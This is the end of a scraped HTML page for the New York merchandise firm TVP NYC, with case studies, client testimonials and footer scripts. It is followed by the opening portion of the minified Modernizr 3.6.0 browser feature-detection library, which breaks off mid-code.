data-overlay-color="" data-overlay-pattern="" data-overlay-pattern-opacity="" data-overlay-pattern-size="" ></div><section class="l-section wpb_row height_full valign_center"><div class="l-section-h i-cf"><div class="g-cols vc_row type_default valign_middle"><div class="vc_col-sm-12 wpb_column vc_column_container"><div class="vc_column-inner"><div class="wpb_wrapper"><div class="g-cols wpb_row type_default valign_top vc_inner "><div class="vc_col-sm-12 wpb_column vc_column_container animate_fade d4"><div class="vc_column-inner"><div class="wpb_wrapper"> <div class="wpb_text_column vc_custom_1551305059603"> <div class="wpb_wrapper"> <p>Case Studies:</p> </div> </div> </div></div></div></div><div class="g-cols wpb_row type_default valign_middle vc_inner "><div class="vc_col-sm-6 wpb_column vc_column_container"><div class="vc_column-inner"><div class="wpb_wrapper"><div class="w-image align_none meta_simple desaturate"><a class="w-image-h" href="https://tvp.nyc/team-rubicon/"><img width="600" height="400" src="https://tvp.nyc/wp-content/uploads/2019/01/header-hero-600x400.jpg" class="attachment-us_600_400_crop size-us_600_400_crop" alt="" /><div class="w-image-meta"></div></a></div> <div class="wpb_text_column "> <div class="wpb_wrapper"> <h6 style="font-family: 'Raleway', sans-serif; font-weight: 400; font-size: 13px; color: #777;">Disaster Response | Ecommerce, Distribution, Tech, Logistics</h6> <h5 style="padding-top: 0; font-family: 'Montserrat', sans-serif; font-weight: 600;">Team Rubicon</h5> </div> </div> </div></div></div><div class="vc_col-sm-6 wpb_column vc_column_container"><div class="vc_column-inner vc_custom_1544725954440"><div class="wpb_wrapper"><div class="w-image align_none meta_simple desaturate"><a class="w-image-h" href="https://tvp.nyc/maapilim/"><img width="600" height="400" src="https://tvp.nyc/wp-content/uploads/2019/01/Cover-600x400.jpg" class="attachment-us_600_400_crop size-us_600_400_crop" alt="" /><div class="w-image-meta"></div></a></div> <div class="wpb_text_column "> <div class="wpb_wrapper"> <h6 style="font-family: 'Raleway', sans-serif; font-weight: 400; font-size: 13px; color: #777;">Mens Grooming | Ecommerce, Distribution, Logistics</h6> <h5 style="padding-top: 0; font-family: 'Montserrat', sans-serif; font-weight: 600;">Maapilim</h5> </div> </div> </div></div></div></div></div></div></div></div></div></section><!-- Row Backgrounds --><div class="upb_color" data-bg-override="0" data-bg-color="#ffffff" data-fadeout="" data-fadeout-percentage="30" data-parallax-content="" data-parallax-content-sense="30" data-row-effect-mobile-disable="true" data-img-parallax-mobile-disable="true" data-rtl="false" data-custom-vc-row="" data-vc="5.6" data-is_old_vc="" data-theme-support="" data-overlay="false" data-overlay-color="" data-overlay-pattern="" data-overlay-pattern-opacity="" data-overlay-pattern-size="" ></div><section class="l-section wpb_row height_medium"><div class="l-section-h i-cf"><div class="g-cols vc_row type_default valign_top"><div class="vc_col-sm-12 wpb_column vc_column_container"><div class="vc_column-inner color_custom" style="color:#ffffff;"><div class="wpb_wrapper"> <div class="wpb_text_column "> <div class="wpb_wrapper"> <h6 style="color: white; font-family: 'Raleway', sans-serif; font-weight: 600; font-size: 16px;">Things our clients have said:</h6> </div> </div> <div class="g-cols wpb_row type_default valign_top vc_inner "><div class="vc_col-sm-6 wpb_column vc_column_container"><div class="vc_column-inner color_custom" style="color:#ffffff;"><div class="wpb_wrapper"><div class="cl-review type_quote layout_clean quote_italic"><div class="cl-review-quote"><div class="cl-review-quote-text" style="font-size:18px;"><q>Since the beginning TVP has been an amazing company to work with, everyone on the team is incredibly responsive, helpful, and creative! Omri has been our go to guy every time we have new product ideas and no matter how wild they are, he always tries to figure out a way to get it made. He breaks down pricing and explains everything so there isn’t any shadiness. Daria is extremely knowledgable and helpful. When we launched our Shopify last year, she was more than willing to walk us through everything. Honestly, we couldn’t have asked for a better company to work with. We’re looking forward to continue working with them!</q></div><div class="cl-review-author" style="font-size:14px;"><span class="cl-review-author-name">Lily Dang</span><span class="cl-review-author-occupation">Halo Top Creamery</span></div></div></div></div></div></div><div class="vc_col-sm-6 wpb_column vc_column_container"><div class="vc_column-inner color_custom" style="color:#ffffff;"><div class="wpb_wrapper"><div class="cl-review type_quote layout_clean quote_italic"><div class="cl-review-quote"><div class="cl-review-quote-text" style="font-size:18px;"><q>From our initial meeting, TVP has been wonderful to work with! Everyone is very responsive and eager to help. We were able to get our products designed, ordered, inventoried and launch our site in a matter of weeks and everything went very smoothly. We look forward to continuing to work together with TVP and make our merch store a success!</q></div><div class="cl-review-author" style="font-size:14px;"><span class="cl-review-author-name">Becca Denenberg</span><span class="cl-review-author-occupation">Director of Marketing, The Points Guy</span></div></div></div><div class="cl-review type_quote layout_clean quote_italic"><div class="cl-review-quote"><div class="cl-review-quote-text" style="font-size:18px;"><q>Creative, knowledgeable, tenacious, competent, committed to excellence, and very easy to work with - those are just a few words that describe TVP NYC.</q></div><div class="cl-review-author" style="font-size:14px;"><span class="cl-review-author-name">Gaia Banovich</span><span class="cl-review-author-occupation">Founder, Axis Tango</span></div></div></div></div></div></div></div></div></div></div></div></div></section><!-- Row Backgrounds --><div class="upb_color" data-bg-override="0" data-bg-color="#0a0a0a" data-fadeout="" data-fadeout-percentage="30" data-parallax-content="" data-parallax-content-sense="30" data-row-effect-mobile-disable="true" data-img-parallax-mobile-disable="true" data-rtl="false" data-custom-vc-row="" data-vc="5.6" data-is_old_vc="" data-theme-support="" data-overlay="false" data-overlay-color="" data-overlay-pattern="" data-overlay-pattern-opacity="" data-overlay-pattern-size="" ></div> </main> </div> </div> </div> <footer class="l-footer" itemscope itemtype="https://schema.org/WPFooter"> <section class="l-section wpb_row height_medium"><div class="l-section-h i-cf"><div class="g-cols vc_row type_default valign_middle"><div class="vc_col-sm-2 wpb_column vc_column_container"><div class="vc_column-inner"><div class="wpb_wrapper"></div></div></div><div class="vc_col-sm-8 wpb_column vc_column_container"><div class="vc_column-inner"><div class="wpb_wrapper"><div class="g-cols wpb_row type_default valign_top vc_inner "><div class="vc_col-sm-1 wpb_column vc_column_container"><div class="vc_column-inner"><div class="wpb_wrapper"></div></div></div><div class="vc_col-sm-10 wpb_column vc_column_container"><div class="vc_column-inner"><div class="wpb_wrapper"> <div class="wpb_text_column "> <div class="wpb_wrapper"> <h5 style="text-align:center; font-family: 'Raleway', sans-serif; font-weight: 600; font-size: 16px;">Interested in working with us?</h5> </div> </div> <span id="creative-link-wrap-3404" class="ult_main_cl ult-adjust-bottom-margin foot-link " > <span class=" ult_crlink" > <a data-ultimate-target='#creative-link-wrap-3404 .ult_colorlink' data-responsive-json-new='{"font-size":"desktop:62px;mobile_landscape:32px;mobile:24px;","line-height":"desktop:52px;mobile_landscape:36px;mobile:28px;"}' href="https://tvp.nyc/contact/" class="ult_colorlink ult-responsive " style="font-family:Montserrat;font-weight:700; " data-textcolor="#000000" data-texthover="#999999"data-style=""> <span data-hover="Contact us now ➔" style="color:#000000;;;" class="ult_btn10_span ">Contact us now ➔</span> </a> </span> </span></div></div></div><div class="vc_col-sm-1 wpb_column vc_column_container"><div class="vc_column-inner"><div class="wpb_wrapper"></div></div></div></div> <div class="wpb_text_column "> <div class="wpb_wrapper"> <p style="font-size: 10px; text-align: center;">© 2014-2019 The Vanity Project, LLC</p> </div> </div> </div></div></div><div class="vc_col-sm-2 wpb_column vc_column_container"><div class="vc_column-inner"><div class="wpb_wrapper"></div></div></div></div></div></section><!-- Row Backgrounds --><div class="upb_color" data-bg-override="0" data-bg-color="#565656" data-fadeout="" data-fadeout-percentage="30" data-parallax-content="" data-parallax-content-sense="30" data-row-effect-mobile-disable="true" data-img-parallax-mobile-disable="true" data-rtl="false" data-custom-vc-row="" data-vc="5.6" data-is_old_vc="" data-theme-support="" data-overlay="false" data-overlay-color="" data-overlay-pattern="" data-overlay-pattern-opacity="" data-overlay-pattern-size="" ></div> </footer> <a class="w-toplink pos_right" href="#" title="Back to top" aria-hidden="true"></a> <a class="w-header-show" href="javascript:void(0);"><span>Menu</span></a> <div class="w-header-overlay"></div> <script> // Store some global theme options used in JS if (window.$us === undefined) window.$us = {}; $us.canvasOptions = ($us.canvasOptions || {}); $us.canvasOptions.disableEffectsWidth = 900; $us.canvasOptions.responsive = true; $us.canvasOptions.backToTopDisplay = 100; $us.canvasOptions.scrollDuration = 1000; $us.langOptions = ($us.langOptions || {}); $us.langOptions.magnificPopup = ($us.langOptions.magnificPopup || {}); $us.langOptions.magnificPopup.tPrev = 'Previous (Left arrow key)'; $us.langOptions.magnificPopup.tNext = 'Next (Right arrow key)'; $us.langOptions.magnificPopup.tCounter = '%curr% of %total%'; $us.navOptions = ($us.navOptions || {}); $us.navOptions.mobileWidth = 1200; $us.navOptions.togglable = true; $us.ajaxLoadJs = true; $us.templateDirectoryUri = '//tvp.nyc/wp-content/themes/Impreza'; </script> <script>$us.headerSettings = {"default":{"options":{"breakpoint":"900","orientation":"hor","sticky":"1","scroll_breakpoint":"80","transparent":true,"width":"300","elm_align":"center","shadow":"none","top_show":"0","top_height":"40","top_sticky_height":"0","top_fullwidth":"1","top_centering":false,"middle_height":"100","middle_sticky_height":"60","middle_fullwidth":"1","middle_centering":false,"elm_valign":"top","bg_img":"","bg_img_wrapper_start":"","bg_img_size":"cover","bg_img_repeat":"repeat","bg_img_position":"top center","bg_img_attachment":"1","bg_img_wrapper_end":"","bottom_show":"0","bottom_height":"60px","bottom_sticky_height":"40","bottom_fullwidth":"1","bottom_centering":false,"bgimage_wrapper_end":""},"layout":{"top_left":[],"top_center":[],"top_right":[],"middle_left":["image:1"],"middle_center":[],"middle_right":["menu:1"],"bottom_left":[],"bottom_center":[],"bottom_right":[],"hidden":[]}},"tablets":{"options":{"breakpoint":"913","orientation":"hor","sticky":"1","scroll_breakpoint":"80","transparent":true,"width":"300","elm_align":"center","shadow":"none","top_show":"0","top_height":"36","top_sticky_height":"36","top_fullwidth":"0","top_centering":false,"middle_height":"80","middle_sticky_height":"50","middle_fullwidth":"0","middle_centering":false,"elm_valign":"top","bg_img":"","bg_img_wrapper_start":"","bg_img_size":"cover","bg_img_repeat":"repeat","bg_img_position":"top center","bg_img_attachment":"1","bg_img_wrapper_end":"","bottom_show":"0","bottom_height":"50","bottom_sticky_height":"50","bottom_fullwidth":"0","bottom_centering":false,"bgimage_wrapper_end":""},"layout":{"top_left":[],"top_center":[],"top_right":[],"middle_left":["image:1"],"middle_center":[],"middle_right":["menu:1"],"bottom_left":[],"bottom_center":[],"bottom_right":[],"hidden":[]}},"mobiles":{"options":{"breakpoint":"1200px","orientation":"hor","sticky":"1","scroll_breakpoint":"80px","transparent":true,"width":"300","elm_align":"center","shadow":"none","top_show":"0","top_height":"36","top_sticky_height":"36","top_fullwidth":"0","top_centering":false,"middle_height":"50","middle_sticky_height":"50","middle_fullwidth":"0","middle_centering":false,"elm_valign":"top","bg_img":"","bg_img_wrapper_start":"","bg_img_size":"cover","bg_img_repeat":"repeat","bg_img_position":"top center","bg_img_attachment":"1","bg_img_wrapper_end":"","bottom_show":"0","bottom_height":"50","bottom_sticky_height":"50","bottom_fullwidth":"0","bottom_centering":false,"bgimage_wrapper_end":""},"layout":{"top_left":[],"top_center":[],"top_right":[],"middle_left":["image:1"],"middle_center":[],"middle_right":["menu:1"],"bottom_left":[],"bottom_center":[],"bottom_right":[],"hidden":[]}},"header_id":"7211"};</script><link rel='stylesheet' id='cl-review-css' href='https://tvp.nyc/wp-content/plugins/codelights-shortcodes-and-widgets/css/cl-review.css?ver=1.4' type='text/css' media='all' /> <script type='text/javascript'> /* <![CDATA[ */ var leadin_wordpress = {"userRole":"visitor","pageType":"home","leadinPluginVersion":"7.0.4"}; /* ]]> */ </script> <script type='text/javascript' async defer src='//js.hs-scripts.com/5208445.js?integration=wordpress&#038;ver=5.2'></script> <script type='text/javascript' src='//tvp.nyc/wp-content/themes/Impreza/js/us.core.min.js?ver=5.6.1'></script> <script type='text/javascript' src='https://tvp.nyc/wp-includes/js/wp-embed.min.js?ver=5.2'></script> </body> </html>
0
/*! modernizr 3.6.0 (Custom Build) | MIT * * https://modernizr.com/download/?-MessageChannel-adownload-ambientlight-animation-apng-appearance-applicationcache-arrow-atobbtoa-audio-audioloop-audiopreload-backdropfilter-backgroundblendmode-backgroundcliptext-backgroundsize-batteryapi-bdi-beacon-bgpositionshorthand-bgpositionxy-bgrepeatspace_bgrepeatround-bgsizecover-blobconstructor-bloburls-blobworkers-borderimage-borderradius-boxshadow-boxsizing-canvas-canvasblending-canvastext-canvaswinding-capture-checked-classlist-contains-contenteditable-contextmenu-cookies-cors-createelementattrs_createelement_attrs-cryptography-cssall-cssanimations-csscalc-csschunit-csscolumns-cssescape-cssexunit-cssfilters-cssgradients-cssgrid_cssgridlegacy-cssinvalid-cssmask-csspointerevents-csspositionsticky-csspseudoanimations-csspseudotransitions-cssreflections-cssremunit-cssresize-cssscrollbar-csstransforms-csstransforms3d-csstransformslevel2-csstransitions-cssvalid-cssvhunit-cssvmaxunit-cssvminunit-cssvwunit-cubicbezierrange-customelements-customevent-customprotocolhandler-dart-datachannel-datalistelem-dataset-datauri-dataview-dataworkers-details-devicemotion_deviceorientation-directory-display_runin-displaytable-documentfragment-ellipsis-emoji-es5-es5array-es5date-es5function-es5object-es5string-es5syntax-es5undefined-es6array-es6collections-es6math-es6number-es6object-es6string-eventlistener-eventsource-exiforientation-fetch-fileinput-filereader-filesystem-flash-flexbox-flexboxlegacy-flexboxtweener-flexwrap-focuswithin-fontface-forcetouch-formattribute-formvalidation-framed-fullscreen-gamepads-generatedcontent-generators-geolocation-getrandomvalues-getusermedia-hairline-hashchange-hidden-hiddenscroll-history-hovermq-hsla-htmlimports-ie8compat-imgcrossorigin-indexeddb-indexeddbblob-inlinesvg-input-inputformaction-inputformenctype-inputformmethod-inputformtarget-inputtypes-intl-jpeg2000-jpegxr-json-lastchild-ligatures-localstorage-lowbandwidth-lowbattery-matchmedia-mathml-mediaqueries-microdata-multiplebgs-mutationobserver-notification-nthchild-objectfit-olreversed-oninput-opacity-outputelem-overflowscrolling-pagevisibility-passiveeventlisteners-peerconnection-performance-picture-placeholder-pointerevents-pointerlock-pointermq-postmessage-preserve3d-progressbar_meter-promises-proximity-queryselector-quotamanagement-regions-requestanimationframe-requestautocomplete-rgba-ruby-sandbox-scriptasync-scriptdefer-scrollsnappoints-seamless-search-serviceworker-sessionstorage-shapes-sharedworkers-siblinggeneral-sizes-smil-speechrecognition-speechsynthesis-srcdoc-srcset-strictmode-stylescoped-subpixelfont-supports-svg-svgasimg-svgclippaths-svgfilters-svgforeignobject-target-template-templatestrings-textalignlast-textareamaxlength-textshadow-texttrackapi_track-time-todataurljpeg_todataurlpng_todataurlwebp-touchevents-transferables-typedarrays-unicode-unicoderange-unknownelements-urlparser-urlsearchparams-userdata-userselect-variablefonts-vibrate-video-videoautoplay-videocrossorigin-videoloop-videopreload-vml-webaudio-webgl-webglextensions-webintents-webp-webpalpha-webpanimation-webplossless_webp_lossless-websockets-websocketsbinary-websqldatabase-webworkers-willchange-wrapflow-xdomainrequest-xhr2-xhrresponsetype-xhrresponsetypearraybuffer-xhrresponsetypeblob-xhrresponsetypedocument-xhrresponsetypejson-xhrresponsetypetext-addtest-atrule-domprefixes-hasevent-mq-prefixed-prefixedcss-prefixedcssvalue-prefixes-setclasses-testallprops-testprop-teststyles !*/ !function(window,document,undefined){function is(A,e){return typeof A===e}function testRunner(){var A,e,t,r,n,o,i;for(var d in tests)if(tests.hasOwnProperty(d)){if(A=[],e=tests[d],e.name&&(A.push(e.name.toLowerCase()),e.options&&e.options.aliases&&e.options.aliases.length))for(t=0;t<e.options.aliases.length;t++)A.push(e.options.aliases[t].toLowerCase());for(r=is(e.fn,"function")?e.fn():e.fn,n=0;n<A.length;n++)o=A[n],i=o.split("."),1===i.length?Modernizr[i[0]]=r:(!Modernizr[i[0]]||Modernizr[i[0]]instanceof Boolean||(Modernizr[i[0]]=new Boolean(Modernizr[i[0]])),Modernizr[i[0]][i[1]]=r),classes.push((r?"":"no-")+i.join("-"))}}function setClasses(A){var e=docElement.className,t=Modernizr._config.classPrefix||"";if(isSVG&&(e=e.baseVal),Modernizr._config.enableJSClass){var r=new RegExp("(^|\\s)"+t+"no-js(\\s|$)");e=e.replace(r,"$1"+t+"js$2")}Modernizr._config.enableClasses&&(e+=" "+t+A.join(" "+t),isSVG?docElement.className.baseVal=e:docElement.className=e)}function addTest(A,e){if("object"==typeof A)for(var t in A)hasOwnProp(A,t)&&addTest(t,A[t]);else{A=A.toLowerCase();var r=A.split("."),n=Modernizr[r[0]];if(2==r.length&&(n=n[r[1]]),"undefined"!=typeof n)return Modernizr;e="function"==typeof e?e():e,1==r.length?Modernizr[r[0]]=e:(!Modernizr[r[0]]||Modernizr[r[0]]instanceof Boolean||(Modernizr[r[0]]=new Boolean(Modernizr[r[0]])),Modernizr[r[0]][r[1]]=e),setClasses([(e&&0!=e?"":"no-")+r.join("-")]),Modernizr._trigger(A,e)}return Modernizr}function createElement(){return"function"!=typeof document.createElement?document.createElement(arguments[0]):isSVG?document.createElementNS.call(document,"http://www.w3.org/2000/svg",arguments[0]):document.createElement.apply(document,arguments)}function cssToDOM(A){return A.replace(/([a-z])-([a-z])/g,function(A,e,t){return e+t.toUpperCase()}).replace(/^-/,"")}function domToCSS(A){return A.replace(/([A-Z])/g,function(A,e){return"-"+e.toLowerCase()}).replace(/^ms-/,"-ms-")}function getBody(){var A=document.body;return A||(A=createElement(isSVG?"svg":"body"),A.fake=!0),A}function injectElementWithStyles(A,e,t,r){var n,o,i,d,a="modernizr",s=createElement("div"),l=getBody();if(parseInt(t,10))for(;t--;)i=createElement("div"),i.id=r?r[t]:a+(t+1),s.appendChild(i);return n=createElement("style"),n.type="text/css",n.id="s"+a,(l.fake?l:s).appendChild(n),l.appendChild(s),n.styleSheet?n.styleSheet.cssText=A:n.appendChild(document.createTextNode(A)),s.id=a,l.fake&&(l.style.background="",l.style.overflow="hidden",d=docElement.style.overflow,docElement.style.overflow="hidden",docElement.appendChild(l)),o=e(s,A),l.fake?(l.parentNode.removeChild(l),docElement.style.overflow=d,docElement.offsetHeight):s.parentNode.removeChild(s),!!o}function contains(A,e){return!!~(""+A).indexOf(e)}function computedStyle(A,e,t){var r;if("getComputedStyle"in window){r=getComputedStyle.call(window,A,e);var n=window.console;if(null!==r)t&&(r=r.getPropertyValue(t));else if(n){var o=n.error?"error":"log";n[o].call(n,"getComputedStyle returning null, its possible modernizr test results are inaccurate")}}else r=!e&&A.currentStyle&&A.currentStyle[t];return r}function roundedEquals(A,e){return A-1===e||A===e||A+1===e}function nativeTestProps(A,e){var t=A.length;if("CSS"in window&&"supports"in window.CSS){for(;t--;)if(window.CSS.supports(domToCSS(A[t]),e))return!0;return!1}if("CSSSupportsRule"in window){for(var r=[];t--;)r.push("("+domToCSS(A[t])+":"+e+")");return r=r.join(" or "),injectElementWithStyles("@supports ("+r+") { #modernizr { position: absolute; } }",function(A){return"absolute"==computedStyle(A,null,"position")})}return undefined}function testProps(A,e,t,r){function n(){i&&(delete mStyle.style,delete mStyle.modElem)}if(r=is(r,"undefined")?!1:r,!is(t,"undefined")){var o=nativeTestProps(A,t);if(!is(o,"undefined"))return o}for(var i,d,a,s,l,c=["modernizr","tspan","samp"];!mStyle.style&&c.length;)i=!0,mStyle.modElem=createElement(c.shift()),mStyle.style=mStyle.modElem.style;for(a=A.length,d=0;a>d;d++)if(s=A[d],l=mStyle.style[s],contains(s,"-")&&(s=cssToDOM(s)),mStyle.style[s]!==undefined){if(r||is(t,"undefined"))return n(),"pfx"==e?s:!0;try{mStyle.style[s]=t}catch(u){}if(mStyle.style[s]!=l)return n(),"pfx"==e?s:!0}return n(),!1}function fnBind(A,e){return function(){return A.apply(e,arguments)}}function testDOMProps(A,e,t){var r;for(var n in A)if(A[n]in e)return t===!1?A[n]:(r=e[A[n]],is(r,"function")?fnBind(r,t||e):r);return!1}function testPropsAll(A,e,t,r,n){var o=A.charAt(0).toUpperCase()+A.slice(1),i=(A+" "+cssomPrefixes.join(o+" ")+o).split(" ");return is(e,"string")||is(e,"undefined")?testProps(i,e,r,n):(i=(A+" "+domPrefixes.join(o+" ")+o).split(" "),testDOMProps(i,e,t))}function detectDeleteDatabase(A,e){var t=A.deleteDatabase(e);t.onsuccess=function(){addTest("indexeddb.deletedatabase",!0)},t.onerror=function(){addTest("indexeddb.deletedatabase",!1)}}function testAllProps(A,e,t){return testPropsAll(A,undefined,undefined,e,t)}var classes=[],tests=[],ModernizrProto={_version:"3.6.0",_config:{classPrefix:"",enableClasses:!0,enableJSClass:!0,usePrefixes:!0},_q:[],on:function(A,e){var t=this;setTimeout(function(){e(t[A])},0)},addTest:function(A,e,t){tests.push({name:A,fn:e,options:t})},addAsyncTest:function(A){tests.push({name:null,fn:A})}},Modernizr=function(){};Modernizr.prototype=ModernizrProto,Modernizr=new Modernizr,Modernizr.addTest("applicationcache","applicationCache"in window),Modernizr.addTest("blobconstructor",function(){try{return!!new Blob}catch(A){return!1}},{aliases:["blob-constructor"]}),Modernizr.addTest("cookies",function(){try{document.cookie="cookietest=1";var A=-1!=document.cookie.indexOf("cookietest=");return document.cookie="cookietest=1; expires=Thu, 01-Jan-1970 00:00:01 GMT",A}catch(e){return!1}}),Modernizr.addTest("cors","XMLHttpRequest"in window&&"withCredentials"in new XMLHttpRequest),Modernizr.addTest("customelements","customElements"in window),Modernizr.addTest("customprotocolhandler",function(){if(!navigator.registerProtocolHandler)return!1;try{navigator.registerProtocolHandler("thisShouldFail")}catch(A){return A instanceof TypeError}return!1}),Modernizr.addTest("customevent","CustomEvent"in window&&"function"==typeof window.CustomEvent),Modernizr.addTest("dataview","undefined"!=typeof DataView&&"getFloat64"in DataView.prototype),Modernizr.addTest("eventlistener","addEventListener"in window),Modernizr.addTest("geolocation","geolocation"in navigator),Modernizr.addTest("history",function(){var A=navigator.userAgent;return-1===A.indexOf("Android 2.")&&-1===A.indexOf("Android 4.0")||-1===A.indexOf("Mobile Safari")||-1!==A.indexOf("Chrome")||-1!==A.indexOf("Windows Phone")||"file:"===location.protocol?window.history&&"pushState"in window.history:!1}),Modernizr.addTest("ie8compat",!window.addEventListener&&!!document.documentMode&&7===document.documentMode),Modernizr.addTest("json","JSON"in window&&"parse"in JSON&&"stringify"in JSON),Modernizr.addTest("messagechannel","MessageChannel"in window),Modernizr.addTest("notification",function(){if(!window.Notification||!window.Notification.requestPermission)return!1;if("granted"===window.Notification.permission)return!0;try{new window.Notification("")}catch(A){if("TypeError"===A.name)return!1}return!0}),Modernizr.addTest("postmessage","postMessage"in window),Modernizr.addTest("queryselector","querySelector"in document&&"querySelectorAll"in document),Modernizr.addTest("serviceworker","serviceWorker"in navigator),Modernizr.addTest("svg",!!document.createElementNS&&!!document.createElementNS("http://www.w3.org/2000/svg","svg").createSVGRect),Modernizr.addTest("templatestrings",function(){var supports;try{eval("``"),supports=!0}catch(e){}return!!supports}),Modernizr.addTest("typedarrays","ArrayBuffer"in window);var supports=!1;try{supports="WebSocket"in window&&2===window.WebSocket.CLOSING}catch(e){}Modernizr.addTest("websockets",supports),Modernizr.addTest("xdomainrequest","XDomainRequest"in window),Modernizr.addTest("webaudio",function(){var A="webkitAudioContext"in window,e="AudioContext"in window;return Modernizr._config.usePrefixes?A||e:e});var CSS=window.CSS;Modernizr.addTest("cssescape",CSS?"function"==typeof CSS.escape:!1),Modernizr.addTest("focuswithin",function(){try{document.querySelector(":focus-within")}catch(A){return!1}return!0});var newSyntax="CSS"in window&&"supports"in window.CSS,oldSyntax="supportsCSS"in window;Modernizr.addTest("supports",newSyntax||oldSyntax),Modernizr.addTest("target",function(){var A=window.document;if(!("querySelectorAll"in A))return!1;try{return A.querySelectorAll(":target"),!0}catch(e){return!1}}),Modernizr.addTest("microdata","getItems"in document),Modernizr.addTest("mutationobserver",!!window.MutationObserver||!!window.WebKitMutationObserver),Modernizr.addTest("passiveeventlisteners",function(){var A=!1;try{var e=Object.defineProperty({},"passive",{get:function(){A=!0}});window.addEventListener("test",null,e)}catch(t){}return A}),Modernizr.addTest("picture","HTMLPictureElement"in window),Modernizr.addTest("es5array",function(){return!!(Array.prototype&&Array.prototype.every&&Array.prototype.filter&&Array.prototype.forEach&&Array.prototype.indexOf&&Array.prototype.lastIndexOf&&Array.prototype.map&&Array.prototype.some&&Array.prototype.reduce&&Array.prototype.reduceRight&&Array.isArray)}),Modernizr.addTest("es5date",function(){var A="2013-04-12T06:06:37.307Z",e=!1;try{e=!!Date.parse(A)}catch(t){}return!!(Date.now&&Date.prototype&&Date.prototype.toISOString&&Date.prototype.toJSON&&e)}),Modernizr.addTest("es5function",function(){return!(!Function.prototype||!Function.prototype.bind)}),Modernizr.addTest("es5object",function(){return!!(Object.keys&&Object.create&&Object.getPrototypeOf&&Object.getOwnPropertyNames&&Object.isSealed&&Object.isFrozen&&Object.isExtensible&&Object.getOwnPropertyDescriptor&&Object.defineProperty&&Object.defineProperties&&Object.seal&&Object.freeze&&Object.preventExtensions)}),Modernizr.addTest("strictmode",function(){"use strict";return!this}()),Modernizr.addTest("es5string",function(){return!(!String.prototype||!String.prototype.trim)}),Modernizr.addTest("es5syntax",function(){var value,obj,stringAccess,getter,setter,reservedWords,zeroWidthChars;try{return stringAccess=eval('"foobar"[3] === "b"'),getter=eval("({ get x(){ return 1 } }).x === 1"),eval("({ set x(v){ value = v; } }).x = 1"),setter=1===value,eval("obj = ({ if: 1 })"),reservedWords=1===obj["if"],zeroWidthChars=eval("_‌� = true"),stringAccess&&getter&&setter&&reservedWords&&zeroWidthChars}catch(ignore){return!1}}),Modernizr.addTest("es5undefined",function(){var A,e;try{e=window.undefined,window.undefined=12345,A="undefined"==typeof window.undefined,window.undefined=e}catch(t){return!1}return A}),Modernizr.addTest("es5",function(){return!!(Modernizr.es5array&&Modernizr.es5date&&Modernizr.es5function&&Modernizr.es5object&&Modernizr.strictmode&&Modernizr.es5string&&Modernizr.json&&Modernizr.es5syntax&&Modernizr.es5undefined)}),Modernizr.addTest("es6array",!!(Array.prototype&&Array.prototype.copyWithin&&Array.prototype.fill&&Array.prototype.find&&Array.prototype.findIndex&&Array.prototype.keys&&Array.prototype.entries&&Array.prototype.values&&Array.from&&Array.of)),Modernizr.addTest("arrow",function(){try{eval("()=>{}")}catch(e){return!1}return!0}),Modernizr.addTest("es6collections",!!(window.Map&&window.Set&&window.WeakMap&&window.WeakSet)),Modernizr.addTest("generators",function(){try{new Function("function* test() {}")()}catch(A){return!1}return!0}),Modernizr.addTest("es6math",!!(Math&&Math.clz32&&Math.cbrt&&Math.imul&&Math.sign&&Math.log10&&Math.log2&&Math.log1p&&Math.expm1&&Math.cosh&&Math.sinh&&Math.tanh&&Math.acosh&&Math.asinh&&Math.atanh&&Math.hypot&&Math.trunc&&Math.fround)),Modernizr.addTest("es6number",!!(Number.isFinite&&Number.isInteger&&Number.isSafeInteger&&Number.isNaN&&Number.parseInt&&Number.parseFloat&&Number.isInteger(Number.MAX_SAFE_INTEGER)&&Number.isInteger(Number.MIN_SAFE_INTEGER)&&Number.isFinite(Number.EPSILON))),Modernizr.addTest("es6object",!!(Object.assign&&Object.is&&Object.setPrototypeOf)),Modernizr.addTest("promises",function(){return"Promise"in window&&"resolve"in window.Promise&&"reject"in window.Promise&&"all"in window.Promise&&"race"in window.Promise&&function(){var A;return new window.Promise(function(e){A=e}),"function"==typeof A}()}),Modernizr.addTest("es6string",!!(String.fromCodePoint&&String.raw&&String.prototype.codePointAt&&String.prototype.repeat&&String.prototype.startsWith&&String.prototype.endsWith&&String.prototype.includes)),Modernizr.addTest("devicemotion","DeviceMotionEvent"in window),Modernizr.addTest("deviceorientation","DeviceOrientationEvent"in window),Modernizr.addTest("filereader",!!(window.File&&window.FileList&&window.FileReader)),Modernizr.addTest("beacon","sendBeacon"in navigator),Modernizr.addTest("lowbandwidth",function(){var A=navigator.connection||{type:0};return 3==A.type||4==A.type||/^[23]g$/.test(A.type)}),Modernizr.addTest("eventsource","EventSource"in window),Modernizr.addTest("fetch","fetch"in window),Modernizr.addTest("xhrresponsetype",function(){if("undefined"==typeof XMLHttpRequest)return!1;var A=new XMLHttpRequest;return A.open("get","/",!0),"response"in A}()),Modernizr.addTest("xhr2","XMLHttpRequest"in window&&"withCredentials"in new XMLHttpRequest),Modernizr.addTest("speechsynthesis","SpeechSynthesisUtterance"in window),Modernizr.addTest("localstorage",function(){var A="modernizr";try{return localStorage.setItem(A,A),localStorage.removeItem(A),!0}catch(e){return!1}}),Modernizr.addTest("sessionstorage",function(){var A="modernizr";try{return sessionStorage.setItem(A,A),sessionStorage.removeItem(A),!0}catch(e){return!1}}),Modernizr.addTest("websqldatabase","openDatabase"in window),Modernizr.addTest("svgfilters",function(){var A=!1;try{A="SVGFEColorMatrixElement"in window&&2==SVGFEColorMatrixElement.SVG_FECOLORMATRIX_TYPE_SATURATE}catch(e){}return A}),Modernizr.addTest("urlparser",function(){var A;try{return A=new URL("http://modernizr.com/"),"http://modernizr.com/"===A.href}catch(e){return!1}}),Modernizr.addTest("urlsearchparams","URLSearchParams"in window),Modernizr.addTest("getUserMedia","mediaDevices"in navigator&&"getUserMedia"in navigator.mediaDevices),Modernizr.addTest("websocketsbinary",function(){var A,e="https:"==location.protocol?"wss":"ws";if("WebSocket"in window){if(A="binaryType"in WebSocket.prototype)return A;try{return!!new WebSocket(e+"://.").binaryType}catch(t){}}return!1}),Modernizr.addTest("atobbtoa","atob"in window&&"btoa"in window,{aliases:["atob-btoa"]}),Modernizr.addTest("framed",window.location!=top.location),Modernizr.addTest("sharedworkers","SharedWorker"in window),Modernizr.addTest("webworkers","Worker"in window);var prefixes=ModernizrProto._config.usePrefixes?" -webkit- -moz- -o- -ms- ".split(" "):["",""];ModernizrProto._prefixes=prefixes,Modernizr.addTest("contains",is(String.prototype.contains,"function"));var 